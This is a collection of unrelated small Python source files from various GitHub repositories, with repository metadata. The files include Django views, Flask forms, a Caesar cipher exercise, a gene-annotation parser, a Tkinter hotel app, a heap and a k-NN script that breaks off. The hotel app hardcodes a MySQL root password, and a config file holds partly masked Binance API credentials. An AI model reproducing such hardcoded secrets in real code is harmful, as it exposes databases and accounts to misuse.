9d642fbda8278d40270b318cc625051848410cec
|
refs/heads/main
| 2023-07-11T03:52:25.272889
| 2021-08-29T16:40:12
| 2021-08-29T16:40:12
| 396,765,258
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 124
|
py
|
from django.urls import path
from .views import test_view
urlpatterns = [
path("test/", test_view, name="test-api"),
]
|
[
"amit9815@gmail.com"
] |
amit9815@gmail.com
|
00991077f6a5359ded0a86e65f894c7c40050c85
|
6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4
|
/FiPf9yTEfo5aBikPF_8.py
|
97078faf7f02374fa833a7b236d05ec723cafa2d
|
[] |
no_license
|
daniel-reich/ubiquitous-fiesta
|
26e80f0082f8589e51d359ce7953117a3da7d38c
|
9af2700dbe59284f5697e612491499841a6c126f
|
refs/heads/master
| 2023-04-05T06:40:37.328213
| 2021-04-06T20:17:44
| 2021-04-06T20:17:44
| 355,318,759
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 182
|
py
|
def coins_combinations(target, coins):
ways = [1] + [0] * target
for coin in coins:
for i in range(coin, target + 1):
ways[i] += ways[i - coin]
return ways[target]
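# Hypothetical usage: there are 4 ways to make 5 from coins {1, 2, 5}
# (1+1+1+1+1, 1+1+1+2, 1+2+2, 5).
if __name__ == '__main__':
    assert coins_combinations(5, [1, 2, 5]) == 4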
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
499f6d90b53fc65d2df4ef3898feec12f9ac46d5
|
cd7897102db3d46738353880dac3376773c09002
|
/blog/members/views.py
|
0c62115c4c5e5fdbd9c960aa81baa806a3d3c4d9
|
[] |
no_license
|
yaroslavgladunn/simpleblog
|
bd01c42c84827aa6a8bc254dbc0f856a4e8cbcd8
|
a621cf9e6bd4c3c58aae71062ea77882c4bdc0fb
|
refs/heads/master
| 2023-06-28T00:21:58.098537
| 2021-07-28T14:13:34
| 2021-07-28T14:13:34
| 390,375,918
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,200
|
py
|
from django.shortcuts import render, get_object_or_404
from django.urls import reverse_lazy
from django.views import generic
from django.views.generic import DetailView, CreateView, ListView
from django.contrib.auth.forms import UserCreationForm, UserChangeForm
from .forms import SignUpForm, UpdateProfileForm, PasswordChangingForm, ProfilePageForm
from django.contrib.auth.views import PasswordChangeView
from django.contrib.auth.forms import PasswordChangeForm
from main.models import Profile, Post
class PortfolioView(ListView):
model = Post
template_name = 'user_profile.html'
ordering = ['-id']
class CreateProfilePage(CreateView):
model = Profile
form_class = ProfilePageForm
template_name = 'registration/create_profile_page.html'
def form_valid(self, form):
form.instance.user = self.request.user
return super().form_valid(form)
class EditProfilePageView(generic.UpdateView):
model = Profile
template_name = 'registration/edit_profilepage.html'
fields = ['bio', 'country', 'profile_pic', 'website_url', 'facebook_url', 'instagram_url', 'twitter_url', 'pinterest_url']
success_url = reverse_lazy('home')
class ProfilePageView(DetailView):
model = Profile
template_name = 'registration/user_profile.html'
def get_context_data(self, *args, **kwargs):
users = Profile.objects.all()
context = super(ProfilePageView, self).get_context_data()
page_user = get_object_or_404(Profile, id=self.kwargs['pk'])
context['page_user'] = page_user
return context
class PasswordsChangeView(PasswordChangeView):
form_class = PasswordChangingForm
success_url = reverse_lazy('password_success')
def password_success(request):
return render(request, 'registration/password_success.html', {})
class UserRegister(generic.CreateView):
form_class = SignUpForm
template_name = 'registration/register.html'
success_url = reverse_lazy('login')
class UserEditView(generic.UpdateView):
form_class = UpdateProfileForm
template_name = 'registration/edit_profile.html'
success_url = reverse_lazy('home')
    def get_object(self):
        return self.request.user
|
[
"debtyman@gmail.com"
] |
debtyman@gmail.com
|
272c8d246f2d0edc452d824052b27a930915a10d
|
f7dcfa02f2cbf0838767b7d3fdbea4de7af22f39
|
/NetworkSecurityLab1/NetworkSecurityLab1.py
|
f05e78c049d1afc3859fa15ae19509473fdf3e00
|
[] |
no_license
|
mutterbucket/NetworkSecurity
|
baacab24e26c36e9a0327e3d2a50bff490e4d8e9
|
1fed3869210a3f96d1cdca3949340351d0a9520a
|
refs/heads/master
| 2021-03-24T20:49:31.406616
| 2020-03-15T22:40:50
| 2020-03-15T22:40:50
| 247,564,059
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,471
|
py
|
alphabet = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',
'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']
def encrypt():
key = input("What is the key for the Caesar shift? ")
key = key.upper() #Everything is processed uppercase
keyindex = alphabet.index(key)
plaintext = input("Enter your plaintext: \n")
plaintext = plaintext.upper()
for x in plaintext: #Each letter is shifted by the distance
letterindex = alphabet.index(x) #between the key and the letter A
if (letterindex + keyindex) > 25:
letterindex = letterindex + keyindex - 26
print (alphabet[letterindex], end = '')
else:
letterindex += keyindex
print (alphabet[letterindex], end = '')
print()
def decrypt():
ciphertext = input("Enter your ciphertext: \n") #All possible solutions are printed
ciphertext = ciphertext.upper()
for x in alphabet:
keyindex = alphabet.index(x)
print (keyindex, ":", end = '')
for y in ciphertext:
letterindex = alphabet.index(y)
if (letterindex + keyindex) > 25:
letterindex = letterindex + keyindex - 26
print (alphabet[letterindex], end = '')
else:
letterindex += keyindex
print (alphabet[letterindex], end = '')
print()
print("Welcome to the Caesar Cipher!")
task = input("Would you like to (E)ncrypt or (D)ecrypt? ")
task = task.upper()
if task == 'E':
encrypt()
elif task == 'D':
decrypt()
else:
print ("Perhaps next time")
|
[
"43102357+mutterbucket@users.noreply.github.com"
] |
43102357+mutterbucket@users.noreply.github.com
|
cc2a1b35d826a740d1f8d108cb04d6b8939050ba
|
8ab66dcf8e91734d730f7799839ceddfa289b4cd
|
/barnacle-1.0.0/src/parsers/genes/ensg.py
|
1ef1afad3eb1dbc3815c9f89c921f5cdd72be45f
|
[] |
no_license
|
ptraverse/gsc
|
7bbbe67652575b5e7d3ca68e85a213fd7536125d
|
21e6b699f91cf9604f973d51745c3975cbd8e22c
|
refs/heads/master
| 2021-01-23T17:58:50.910026
| 2013-01-03T09:06:05
| 2013-01-03T09:06:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,951
|
py
|
"""
ensg.py
Created by Readman Chiu
Edited by Lucas Swanson
Copyright (c) 2012 Canada's Michael Smith Genome Sciences Centre. All rights reserved.
"""
import transcript
from optparse import OptionParser
import os
fields = {0:"name", 1:"chrom", 2:"strand", 3:"txStart", 4:"txEnd",
5:"exonCount", 6:"exonStarts", 7:"exonEnds"}
def parse(file):
txts = []
ff = open(file, 'r')
for line in ff.readlines():
cols = line.split("\t")
if cols[0]:
txt = transcript.Transcript(cols[1])
for i in range(len(cols)):
if i in fields:
if i < 8:
setattr(txt, fields[i], cols[i])
exonStarts = cols[6].rstrip(',').split(',')
exonEnds = cols[7].rstrip(',').split(',')
txt.exons = []
for e in range(len(exonStarts)):
txt.exons.append([int(exonStarts[e])+1, int(exonEnds[e])])
#calculate transcript length for coverage
for exon in txt.exons:
txt.length += int(exon[1]) - int(exon[0]) + 1
#print txt.name, txt.exonCount, txt.length, txt.exons[0]
txts.append(txt)
ff.close()
return txts
def parse_line(line):
cols = line.split("\t")
if cols[0]:
txt = transcript.Transcript(cols[1])
for i in range(len(cols)):
if i in fields:
if i < 8:
setattr(txt, fields[i], cols[i])
exonStarts = cols[6].rstrip(',').split(',')
exonEnds = cols[7].rstrip(',').split(',')
txt.exons = []
for e in range(len(exonStarts)):
txt.exons.append([int(exonStarts[e])+1, int(exonEnds[e])])
#calculate transcript length for coverage
for exon in txt.exons:
txt.length += int(exon[1]) - int(exon[0]) + 1
return txt
return None
def index(input, output):
indices = {}
data_file = os.path.abspath(input)
line_num = 1
for line in open(input, 'r'):
cols = line.rstrip().split("\t")
start = int(int(cols[3])/1000)
end = int(int(cols[4])/1000)
target = cols[1]
for n in range(start,end+1):
index = ':'.join((target,str(n)))
value = str(line_num)
if not indices.has_key(index):
indices[index] = [value]
else:
indices[index].append(value)
line_num += 1
index_file = open(output, 'w')
for index in sorted(indices.keys()):
index_file.write(' '.join((index, ','.join(indices[index]))) + "\n")
if __name__ == '__main__':
usage = "Usage: %prog annotation-file"
parser = OptionParser(usage=usage)
parser.add_option("-i", "--index", dest="index", help="index output file")
(options, args) = parser.parse_args()
if options.index:
index(args[0], options.index)
|
[
"philippe.traverse@gmail.com"
] |
philippe.traverse@gmail.com
|
d6d54dd17e23114be695e165facff7061e49ed26
|
f1e3535eb173076192b4e0f2ac7b7025c574c576
|
/vacancy.py
|
0ae4f08ca96c8a808d537f95e9dab3d503680cd4
|
[] |
no_license
|
ravi2129/HotelBillingSystem
|
90dcf63f679b871e430d4bafb38b3fa6dadc9f95
|
3f2809c8fe05d8771d164e1a4965295801ebf3b4
|
refs/heads/master
| 2023-06-16T23:03:21.903826
| 2021-07-16T17:11:20
| 2021-07-16T17:11:20
| 386,711,431
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,847
|
py
|
from tkinter import *
import mysql.connector
root = Tk(className=" HOTEL MANAGEMENT")
root.geometry('1200x600')
# heading
heading_label = Label(root, text="--------- ALL VACANCIES ---------", font=('Orbitron', 15), bg="black", fg="white")
heading_label.pack(fill=X)
top_frame = Frame(root)
top_frame.pack()
# label
o_label = Label(top_frame, text='OCCUPIED', fg='red', font=('Orbitron', 25))
u_label = Label(top_frame, text='UN-OCCUPIED', fg='green', font=('Orbitron', 25))
o_label.grid(row=0, column=0)
u_label.grid(row=0, column=1)
# text bar
text_o = Text(top_frame, bd=5, fg="red", width=50, bg='#b3ffe6', font=('Teko SemiBold', 20))
text_o.grid(row=1, column=0)
text_u = Text(top_frame, bd=5, fg="green", width=50, bg='#b3ffe6', font=('Teko SemiBold', 20))
text_u.grid(row=1, column=1)
# data Show
rooms = [100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110,
200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210,
300, 301, 302, 303, 304, 305, 306, 307, 308, 309, 310,
400, 401, 402, 403, 404, 405, 406, 407, 408, 409, 410,
500, 501, 502, 503, 504, 505, 506, 507, 508, 509, 510]
mydb = mysql.connector.connect(host='localhost', user='root', password='Admin1234', database='hotel')
cur = mydb.cursor()
cur.execute('SELECT Room_No from hotel_management')
result = cur.fetchall()
occupied_rooms = []
for i in result:
a = list(i)
occupied_rooms.append(a[0])
c1 = 0
c2 = 0
for j in rooms:
if j in occupied_rooms:
text_o.insert(INSERT, str(j))
text_o.insert(INSERT, "\t")
c1 = c1 + 1
if c1 == 6:
text_o.insert(INSERT, "\n")
c1 = 0
else:
text_u.insert(INSERT, str(j))
text_u.insert(INSERT, "\t")
c2 = c2 + 1
if c2 == 6:
text_u.insert(INSERT, "\n")
c2 = 0
root.mainloop()
|
[
"ravirajdange1234@gmail.com"
] |
ravirajdange1234@gmail.com
|
92c3e4dd4b78b2184b1fa13bbb9217ce0ce57cc7
|
b9b19245a0d5bafbc33ca46c204cee61cb34549b
|
/Test-Site/app/DATA.py
|
c6defff07a07fa409aff12df1e32477131fd6686
|
[] |
no_license
|
minhminh322/vinhr-test-site
|
f2cf5a81ad4e25e5e99d47f3a1dc23d346e9e8c7
|
2601457e73f59d9f4e99c1c0a10388fd5683157b
|
refs/heads/master
| 2022-04-10T04:18:20.151454
| 2019-12-17T05:07:01
| 2019-12-17T05:07:01
| 228,536,347
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,340
|
py
|
import numpy as np
from datetime import datetime, timedelta
from pathlib import Path
import subprocess
import os
from src.imports import *
from src.connectors import cosmos
from time import time
import pandas as pd
from config import (
DATA_FILENAME,
DATA_FOLDER
)
def init_():
# global DB
# DB = mongo.mongo_connect()
# print('Initializing data')
# start = time()
connect_string='mongodb://w2c-healthcheck:fXhZ7CvUSHN6L18MtNS86SoaHbe20BB3yQxPzGmLGGnVGWMh4e63a2l3YSFK94Qvc9MmsyfLMVw8GWDxUBOxng==@w2c-healthcheck.documents.azure.com:10255/?ssl=true&replicaSet=globaldb'
global DB
DB = cosmos.get_database(connect_string,'testsite')
print('Initializing data')
### load label map
# Label map contains metadata about the labels, like the label in vietnamese,
# color code for this label to show
#labels_list = ['DG','DX','HB','LN','LC','OT']
    df_label_map = pd.read_csv(str(DATA_FOLDER / 'label_map.csv'))
#df_label_map = df_label_map[df_label_map.Code.isin(labels_list)].reset_index(drop=True)
|
[
"ptminh2013@gmail.com"
] |
ptminh2013@gmail.com
|
61bbc1803f66e0ce1eb371b599d5c88b02d5222a
|
6beeacc1cfff817885ee25f8eee9e6beb4225e14
|
/forms.py
|
115c6a9d672288a98eb1d06ca9f0ff51fe174b2f
|
[] |
no_license
|
Aaqib5wani/blogging-web-app
|
52f80678b6b5e1e251f578c7bdc3fb191636f4b8
|
479d3f4a6f88c4d35390c36edc77e9d5b7f379c1
|
refs/heads/main
| 2023-05-01T23:50:16.247450
| 2021-05-22T22:37:32
| 2021-05-22T22:37:32
| 353,586,181
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,260
|
py
|
from flask_wtf import FlaskForm
from wtforms import Form, validators, StringField, SubmitField, PasswordField, TextField, TextAreaField
from wtforms.validators import DataRequired, length, Email, EqualTo
class Register(FlaskForm):
username = StringField('Username',validators=[DataRequired(),length(max=20,min=2)])
name = StringField('Name', validators=[DataRequired(), length(max=40, min=2)])
email = StringField('Email', validators=[DataRequired(), length(max=50, min=2),Email()])
password=PasswordField('Password',validators=[DataRequired()])
confirm_password=PasswordField('Confirm_password',validators=[DataRequired(),EqualTo('password')])
submit=SubmitField('Submit')
class Login(FlaskForm):
email = StringField('Email', validators=[DataRequired(), length(max=50, min=2),Email()])
password=PasswordField('Password',validators=[DataRequired()])
submit=SubmitField('Submit')
class Enter_post(FlaskForm):
title = StringField('title',validators=[DataRequired(),length(max=100,min=5)])
subtitle = StringField('subtitle', validators=[DataRequired(), length(max=50, min=2)])
content = TextAreaField('content', validators=[DataRequired(), length(max=10000, min=10)])
submit=SubmitField('Submit')
|
[
"aqib.ahmad76@yahoo.com"
] |
aqib.ahmad76@yahoo.com
|
c2fed0456acb3e83e3cc74e55ca7759f86496a17
|
9217fc7adb14677a60b928e114bcbfa48eeae2c1
|
/FIbonacci sequence generator.py
|
69150f71431d6b9ec35ee2668f997dc65aac9900
|
[] |
no_license
|
DaniloPierpaoli/Some-code-might-make-sense-Python-
|
e26a883ec8f0ecc09430243a9c5188d86ef8ad5e
|
540298cbf35e7f7d54988e498a103241020d7e7c
|
refs/heads/main
| 2023-02-28T18:56:33.890753
| 2021-02-11T21:05:18
| 2021-02-11T21:05:18
| 305,863,881
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,788
|
py
|
''' This script generates n numbers within the Fibonacci sequence.
It contains a generator function and a main function that drives it'''
def fib_gen(n):
'''This function is called by main_func().
It's a generator that takes n as argument.
It iterates n times'''
iterations = 0
fib_num = 0
next_num = 1
while iterations < n:
yield fib_num
fib_num, next_num = next_num, fib_num + next_num
iterations += 1
def main_func():
    ''' This function first asks how many numbers of the sequence are needed.
    Then it asks whether the whole sequence up to the n-th number should be
    printed or only the n-th number. In the first case the iterator prints
    out each element generated by the generator function. In the latter, a
    list is cast from the generator and its last element is printed.'''
while True:
try:
n = int(input("How many numbers in the Fibonacci series do you need?"))
except ValueError:
print('Please insert an integer!')
break
else:
pass
if n > 0:
pass
else:
print('No numbers!')
break
        print('Do you want to know only the n-th number in the Fibonacci sequence,')
        print('or do you want to see the whole sequence generated?')
        choice = int(input('Please press 1 for the first option or 2 for the second option: '))
if choice == 1:
list_cast = list(fib_gen(n))
print(f'The {n}-th number of the Fibonacci sequence is {list_cast[-1]}')
break
else:
for item in fib_gen(n):
print(item)
break
if __name__ == '__main__':
main_func()
|
[
"noreply@github.com"
] |
DaniloPierpaoli.noreply@github.com
|
0b517f1055cff39cd955e436fb7d0efeb2a31469
|
3d504a0bc1c110d8c63daf485aa0bd0491068d72
|
/StockBot/config.py
|
ae73823705fcde9a3f515c3f1ca6940ed12e21e2
|
[
"MIT"
] |
permissive
|
parateakshay/StockBot
|
4bd3126fffc6dac91eca5882bbecf9769fc46fda
|
2f50da19451b352ae6d27f6b8c7cf3b2744c321b
|
refs/heads/main
| 2023-05-16T23:45:02.854056
| 2021-05-30T06:22:45
| 2021-05-30T06:22:45
| 372,135,004
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 204
|
py
|
# enter your own api key and api secret from your binance account
API_KEY = 'quoYMl0sL********************Lir8BXW1H8C1Qg******pXTeWhU9wKy'
API_SECRET = 'oI72****************LhIlh66BZpiVWwEZ2R2*******zRGD'
|
[
"49017391+parateakshay@users.noreply.github.com"
] |
49017391+parateakshay@users.noreply.github.com
|
3aa1a3ed0fa9ca760bd6c4c5d61f13ee0d6e9421
|
5b8d0cd314fdd4537bc77ce9209ca903694b02e8
|
/datasets/un_multi/un_multi.py
|
a6feaad48a61c782c0fa14b118fc5305145bbcf2
|
[
"Apache-2.0"
] |
permissive
|
amankhandelia/datasets
|
97106f6d98b9cd17c50b1bf0c91f4ced6240dfd6
|
1a138f9bd2d1b62a255736375001bf918d36508d
|
refs/heads/master
| 2023-06-21T01:08:25.212378
| 2021-07-26T13:27:59
| 2021-07-26T13:27:59
| 389,644,974
| 1
| 0
|
Apache-2.0
| 2021-07-26T14:36:09
| 2021-07-26T13:36:08
| null |
UTF-8
|
Python
| false
| false
| 4,634
|
py
|
# coding=utf-8
# Copyright 2020 The HuggingFace Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""MultiUN: Multilingual UN Parallel Text 2000—2009"""
import itertools
import os
import datasets
_CITATION = """\
@inproceedings{eisele-chen-2010-multiun,
title = "{M}ulti{UN}: A Multilingual Corpus from United Nation Documents",
author = "Eisele, Andreas and
Chen, Yu",
booktitle = "Proceedings of the Seventh International Conference on Language Resources and Evaluation ({LREC}'10)",
month = may,
year = "2010",
address = "Valletta, Malta",
publisher = "European Language Resources Association (ELRA)",
url = "http://www.lrec-conf.org/proceedings/lrec2010/pdf/686_Paper.pdf",
abstract = "This paper describes the acquisition, preparation and properties of a corpus extracted from the official documents of the United Nations (UN). This corpus is available in all 6 official languages of the UN, consisting of around 300 million words per language. We describe the methods we used for crawling, document formatting, and sentence alignment. This corpus also includes a common test set for machine translation. We present the results of a French-Chinese machine translation experiment performed on this corpus.",
}
@InProceedings{TIEDEMANN12.463,
  author = {Jörg Tiedemann},
title = {Parallel Data, Tools and Interfaces in OPUS},
booktitle = {Proceedings of the Eight International Conference on Language Resources and Evaluation (LREC'12)},
year = {2012},
month = {may},
date = {23-25},
address = {Istanbul, Turkey},
editor = {Nicoletta Calzolari (Conference Chair) and Khalid Choukri and Thierry Declerck and Mehmet Ugur Dogan and Bente Maegaard and Joseph Mariani and Jan Odijk and Stelios Piperidis},
publisher = {European Language Resources Association (ELRA)},
isbn = {978-2-9517408-7-7},
}
"""
_DESCRIPTION = """\
This is a collection of translated documents from the United Nations. \
This corpus is available in all 6 official languages of the UN, \
consisting of around 300 million words per language
"""
_HOMEPAGE = "http://www.euromatrixplus.net/multi-un/"
_LANGUAGES = ["ar", "de", "en", "es", "fr", "ru", "zh"]
_LANGUAGE_PAIRS = list(itertools.combinations(_LANGUAGES, 2))
_BASE_URL = "http://opus.nlpl.eu/download.php?f=MultiUN/v1/moses"
_URLS = {f"{l1}-{l2}": f"{_BASE_URL}/{l1}-{l2}.txt.zip" for l1, l2 in _LANGUAGE_PAIRS}
class UnMulti(datasets.GeneratorBasedBuilder):
"""MultiUN: Multilingual UN Parallel Text 2000—2009"""
VERSION = datasets.Version("1.0.0")
BUILDER_CONFIGS = [
datasets.BuilderConfig(name=f"{l1}-{l2}", version=datasets.Version("1.0.0"), description=f"MultiUN {l1}-{l2}")
for l1, l2 in _LANGUAGE_PAIRS
]
def _info(self):
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=datasets.Features(
{"translation": datasets.features.Translation(languages=tuple(self.config.name.split("-")))}
),
supervised_keys=None,
homepage=_HOMEPAGE,
citation=_CITATION,
)
def _split_generators(self, dl_manager):
"""Returns SplitGenerators."""
lang_pair = self.config.name.split("-")
data_dir = dl_manager.download_and_extract(_URLS[self.config.name])
return [
datasets.SplitGenerator(
name=datasets.Split.TRAIN,
gen_kwargs={
"source_file": os.path.join(data_dir, f"MultiUN.{self.config.name}.{lang_pair[0]}"),
"target_file": os.path.join(data_dir, f"MultiUN.{self.config.name}.{lang_pair[1]}"),
},
),
]
def _generate_examples(self, source_file, target_file):
source, target = tuple(self.config.name.split("-"))
with open(source_file, encoding="utf-8") as src_f, open(target_file, encoding="utf-8") as tgt_f:
for idx, (l1, l2) in enumerate(zip(src_f, tgt_f)):
result = {"translation": {source: l1.strip(), target: l2.strip()}}
yield idx, result
|
[
"noreply@github.com"
] |
amankhandelia.noreply@github.com
|
cfab785ce084dc5579df6d95bd1a5684db5979c8
|
1180c0bfe29959d95f3c131e6e839950e528d4ee
|
/27/bbelderbos/reddit.py
|
0cd0f37cd9d9c63eac8c4db733b8ed907e730fa1
|
[] |
no_license
|
pybites/challenges
|
e3e461accd8e7f890aee8007ba5070086ef983fc
|
02b77652d0901e6e06cb9b1e7cb3e59c675445c2
|
refs/heads/community
| 2023-08-20T18:19:02.982214
| 2022-11-17T09:23:31
| 2022-11-17T09:23:31
| 78,264,928
| 764
| 3,115
| null | 2023-07-21T05:58:19
| 2017-01-07T07:17:50
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 664
|
py
|
import os
import praw
DEFAULT_SUBREDDIT = 'learnpython'
reddit = praw.Reddit(client_id=os.environ.get('PRAW_CLIENT_ID'),
client_secret=os.environ.get('PRAW_CLIENT_SECRET'),
password=os.environ.get('PRAW_PASSWORD'),
user_agent='pybites_codechallenges by /u/bbelderbos',
username='bbelderbos')
def submit_to_reddit(post, subreddit=DEFAULT_SUBREDDIT):
'''Submits post to subreddit'''
title = post.title
text = '{} - {}'.format(post.summary, post.url)
return reddit.subreddit(subreddit).submit(title,
selftext=text)
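# Hypothetical usage: any object exposing title, summary, and url attributes works, e.g.
#   from collections import namedtuple
#   Post = namedtuple('Post', 'title summary url')
#   submit_to_reddit(Post('TIL', 'A Python tip', 'https://pybit.es'))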
|
[
"pybites@projects.bobbelderbos.com"
] |
pybites@projects.bobbelderbos.com
|
a365c0900c5259c9243e20eb8b7601ae313932a4
|
da717bc538ac2606c881e917e862b6a6ed7dee55
|
/models/time.py
|
3e49c6388cb21b46c4bfebc84d69280ebe2c2ec8
|
[] |
no_license
|
bavaria95/taxi-service
|
25f59f6949a037112f4a95fd0054273ec16d7ba7
|
463db8fdc26e417d43fa201451903afd942c1a27
|
refs/heads/master
| 2022-11-30T01:21:22.689407
| 2020-08-06T22:49:02
| 2020-08-06T22:49:02
| 285,102,153
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 435
|
py
|
class Time(object):
'''
Represents time entity in our world.
By default we start from timestamp 0
By calling `.tick` method we increment time in our world (by default on 1 unit)
'''
def __init__(self, time=0):
self._time = time
def __repr__(self):
        return str(self._time)
def tick(self, i=1):
self._time += i
@property
def time(self):
return self._time
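# Hypothetical usage: advance the world clock by single and multi-unit ticks.
if __name__ == '__main__':
    t = Time()
    t.tick()
    t.tick(5)
    assert t.time == 6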
|
[
"petruk@ebu.ch"
] |
petruk@ebu.ch
|
f5bb3595b110a02703f4d2c0f334882150534e0d
|
bb52e1ad4b70b1e26a7e075258dcc7cc9afc3670
|
/hw3/CS430_AakefWaris_HW3/dataStructures/Trees.py
|
9d0aa38df26be7548f32aee42be6774c8f41b329
|
[] |
no_license
|
awaris123/cs430
|
644c557bf4225aaf474ae0b1ab7bd5afa22d7946
|
27ae28d6fd3ff6f8705c4dde43341882ffdb900d
|
refs/heads/master
| 2022-07-14T19:03:13.773947
| 2020-03-10T21:01:05
| 2020-03-10T21:01:05
| 239,395,459
| 0
| 1
| null | 2022-06-22T01:24:02
| 2020-02-10T00:14:31
|
Python
|
UTF-8
|
Python
| false
| false
| 1,589
|
py
|
class Heap:
def __init__(self, key=lambda x:x):
self.data = []
self.key = key
@staticmethod
def _parent(idx):
return (idx-1)//2
@staticmethod
def _left(idx):
return idx*2+1
@staticmethod
def _right(idx):
return idx*2+2
def heapify(self, idx=0):
while True:
l = Heap._left(idx)
r = Heap._right(idx)
maxidx = idx
if l < len(self) and self.key(self.data[l]) > self.key(self.data[idx]):
maxidx = l
if r < len(self) and self.key(self.data[r]) > self.key(self.data[maxidx]):
maxidx = r
if maxidx != idx:
self.data[idx], self.data[maxidx] = self.data[maxidx], self.data[idx]
idx = maxidx
else:
break
def add(self, x):
self.data.append(x)
i = len(self.data) - 1
p = Heap._parent(i)
while i > 0 and self.key(self.data[p]) < self.key(self.data[i]):
self.data[i], self.data[p] = self.data[p], self.data[i]
i = p
p = Heap._parent(i)
def peek(self):
return self.data[0]
def pop(self):
ret = self.data[0]
self.data[0] = self.data[len(self.data)-1]
del self.data[len(self.data)-1]
self.heapify()
return ret
def __bool__(self):
return len(self.data) > 0
def __len__(self):
return len(self.data)
def __repr__(self):
return repr(self.data)
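# Hypothetical usage: with the default key this is a max-heap, so pop()
# drains items in descending order.
if __name__ == '__main__':
    h = Heap()
    for x in [3, 1, 4, 1, 5]:
        h.add(x)
    assert [h.pop() for _ in range(len(h))] == [5, 4, 3, 1, 1]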
|
[
"awaris@hawk.iit.edu"
] |
awaris@hawk.iit.edu
|
98ca1c0a18b55a68e9da55eca21ddd19fec6a124
|
8232c899532ac77c5b20f0651bac062c57509a7f
|
/Aulas/032.py
|
0d6891f0540afa5e503fe59e26409084e968fa0b
|
[] |
no_license
|
Rollbusch/Learning-Python
|
1b9d957e0090d8095e95b150494614fcc69defc2
|
de8b3c78dad472bf8690edd0adfcb75e3a1159ac
|
refs/heads/main
| 2023-05-05T00:43:26.677134
| 2021-05-19T15:47:13
| 2021-05-19T15:47:13
| 368,921,977
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 346
|
py
|
from datetime import date
ano = int(input('Which year do you want to check? Enter 0 for the current year: '))
if ano == 0:
    ano = date.today().year  # use today's year
if (ano % 4 == 0 and ano % 100 != 0) or ano % 400 == 0:
    print('The year IS a leap year')
else:
    print('The year is NOT a leap year')
print('Year checked: {}'.format(ano))
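# Worked examples of the rule: 2000 is a leap year (divisible by 400),
# 1900 is not (divisible by 100 but not by 400), and 2024 is
# (divisible by 4 but not by 100).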
|
[
"RollbuschPlay@hotmail.com"
] |
RollbuschPlay@hotmail.com
|
1283c2282531b9e62beb9fa486f32df182acf868
|
781e2692049e87a4256320c76e82a19be257a05d
|
/assignments/python/series/src/139.py
|
8e64d3c15de6596fb8a75a48d232e64b488e519a
|
[] |
no_license
|
itsolutionscorp/AutoStyle-Clustering
|
54bde86fe6dbad35b568b38cfcb14c5ffaab51b0
|
be0e2f635a7558f56c61bc0b36c6146b01d1e6e6
|
refs/heads/master
| 2020-12-11T07:27:19.291038
| 2016-03-16T03:18:00
| 2016-03-16T03:18:42
| 59,454,921
| 4
| 0
| null | 2016-05-23T05:40:56
| 2016-05-23T05:40:56
| null |
UTF-8
|
Python
| false
| false
| 335
|
py
|
def slices(numbers, slicesize):
    numlist = [int(digit) for digit in numbers]
    resultlist = []
    for i in range(len(numlist) - slicesize + 1):
        window = numlist[i:i + slicesize]
        if window:  # guards against a zero slice size
            resultlist.append(window)
    if not resultlist:
        raise ValueError('slice size is larger than the input series')
    return resultlist
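# Minimal usage sketch (not part of the original file):
# slices('01234', 2) -> [[0, 1], [1, 2], [2, 3], [3, 4]]
# slices('012', 4)   -> raises ValueError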
|
[
"rrc@berkeley.edu"
] |
rrc@berkeley.edu
|
a6aca129c6f8fbfc57a41360378db1348932274e
|
fae3d8d975aacf82bc38d05bc47ab698b159fb9f
|
/euclid.py
|
931960414e291f188a544c58a0a47bef7d8c7cad
|
[] |
no_license
|
radsn23/ML-alg
|
666d234dc86eecaf28a030ee81aabe40e3ded223
|
c48f75bc0e1db0c6b8941843a613ddb155425cff
|
refs/heads/master
| 2021-06-13T14:38:49.664247
| 2017-02-16T07:56:47
| 2017-02-16T07:56:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,036
|
py
|
import numpy as np
from math import sqrt
import warnings
from collections import Counter
import pandas as pd
import random
# [[plt.scatter(ii[0],ii[1], s=100, color = i) for ii in dataset[i]] for i in dataset]
# plt.scatter(new_features[0], new_features[1])
# plt.show()
def knn(data,predict,k = 3):
    if len(data) >= k:
        warnings.warn('k is set to a value less than the total number of voting groups!')
distances = []
for group in data:
for features in data[group]:
#euclidean_distance = sqrt((features[0] - predict[0])**2 + (features[1] - predict[1])**2)
euclid_dist = np.linalg.norm(np.array(features) - np.array(predict))
distances.append([euclid_dist, group])
votes = [i[1] for i in sorted(distances)[:k]]
# print(Counter(votes).most_common(1))
vote_result = Counter(votes).most_common(1)[0][0]
confidence = Counter(votes).most_common(1)[0][1] / k
return vote_result, confidence
accuracies = []
for i in range(5):
df = pd.read_csv('breast-cancer-wisconsin.data.txt')
df.replace('?',-99999, inplace=True)
df.drop(['id'],1, inplace=True)
